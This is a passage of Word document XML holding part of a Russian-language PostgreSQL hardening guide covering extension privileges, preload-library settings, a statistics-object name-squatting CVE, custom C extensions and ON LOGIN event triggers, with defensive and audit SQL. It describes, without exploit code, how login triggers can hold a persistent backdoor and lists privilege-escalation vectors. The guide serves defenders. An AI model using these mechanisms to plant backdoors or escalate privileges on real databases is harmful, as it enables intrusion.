          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER DEFAULT PRIVILEGES</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 Для всех новых функций, создаваемых superuser-ом в schema public:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER DEFAULT PRIVILEGES FOR ROLE postgres IN SCHEMA public</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    REVOKE EXECUTE ON FUNCTIONS FROM PUBLIC;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То же для tables (новые таблицы — без PUBLIC SELECT):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER DEFAULT PRIVILEGES IN SCHEMA app</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    REVOKE ALL ON TABLES FROM PUBLIC;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Это применяется к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">новым</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> объектам; существующие — нужно REVOKE отдельно.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Specific config: `local_preload_libraries` и `session_preload_libraries`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Параметр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">shared_preload_libraries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (в postgresql.conf) определяет, какие C-расширения загружаются при старте postmaster. Если у атакующего нет права писать в data directory, он не может добавить туда extension control file — но может через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">local_preload_libraries</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session_preload_libraries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, если соответствующие GUC доступны для роли.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Запретить override этих GUC через ALTER ROLE/ALTER DATABASE:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER DATABASE app_db SET local_preload_libraries = '';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER DATABASE app_db SET session_preload_libraries = '';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Через postgresql.conf:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- session_preload_libraries = ''</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- local_preload_libraries = ''</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для managed-провайдеров значения этих GUC обычно строго контролируются.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE STATISTICS как proxy для расширений</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2025-12817 (R23) показала, что statistics-объекты — отдельный attack surface, не покрытый стандартными «не ставь dblink»-рекомендациями. Atака — name-squatting в чужих схемах от owner-а собственной таблицы. Mitigation — patch на 18.1 / 17.7 / 16.11 / 15.15 / 14.20 / 13.23, plus audit:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Все statistics objects от non-admin ролей:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT n.nspname AS schema, s.stxname AS name, r.rolname AS owner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_statistic_ext s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JOIN pg_namespace n ON n.oid = s.stxnamespace</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JOIN pg_authid r ON r.oid = s.stxowner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE r.rolname NOT IN ('postgres', 'dba_role')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY n.nspname, s.stxname;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Custom C extensions (внутренние)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Самописные C-расширения — наиболее опасный класс, потому что они не проходят PostgreSQL security review. Любая memory-corruption в custom extension — server-side RCE. Принципы:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Build от source с тех же compiler flags, что и сервер (stack protectors, ASLR).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Code review минимум двух DBA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Audit логирования вызовов через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_stat_user_functions</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4. Не устанавливать на managed-провайдерах (даже если provider разрешает).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection-time hooks: `ON LOGIN` event triggers (PG 17+)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG 17 ввёл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE EVENT TRIGGER ... ON LOGIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, что позволяет выполнить SQL при каждом подключении. Это feature для audit / setup, но и backdoor-механизм: атакующий, получивший CREATE на DB и привилегию создавать event triggers, может разместить persistent payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT evtname, evtevent, evtenabled, evtfoid::regprocedure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_event_trigger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE evtevent = 'login';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если есть login event triggers, не созданные admin/DBA-ролью — высокий приоритет audit. Restrict через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">REVOKE CREATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">event_triggers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> GUC (set to off — но это disable весь mechanism, не targeted).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Связь с другими разделами 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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Привилегии — расширение и privilege тесно связаны: одно расширение даёт USAGE на сотни функций.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5.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Логирование —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extension сам важен в обсуждении расширений: ставить нужно, но настраивать через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pgaudit.log = 'ddl, role, write'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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — sqlglot-style pre-execution analysis может детектировать опасные функции из расширений до выполнения.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Связь с категориями 3.X.N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2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Расширения trusted vs untrusted — концептуальная база.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3.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Все подразделы — конкретные attack-vectors через dblink / postgres_fdw / pg_read_server_files / lo_import.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3.7.2 / 3.7.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> plperlu / plpython3u — RCE через untrusted PL.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3.13.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trusted extensions как ступень эскалации — R28.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3.17.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
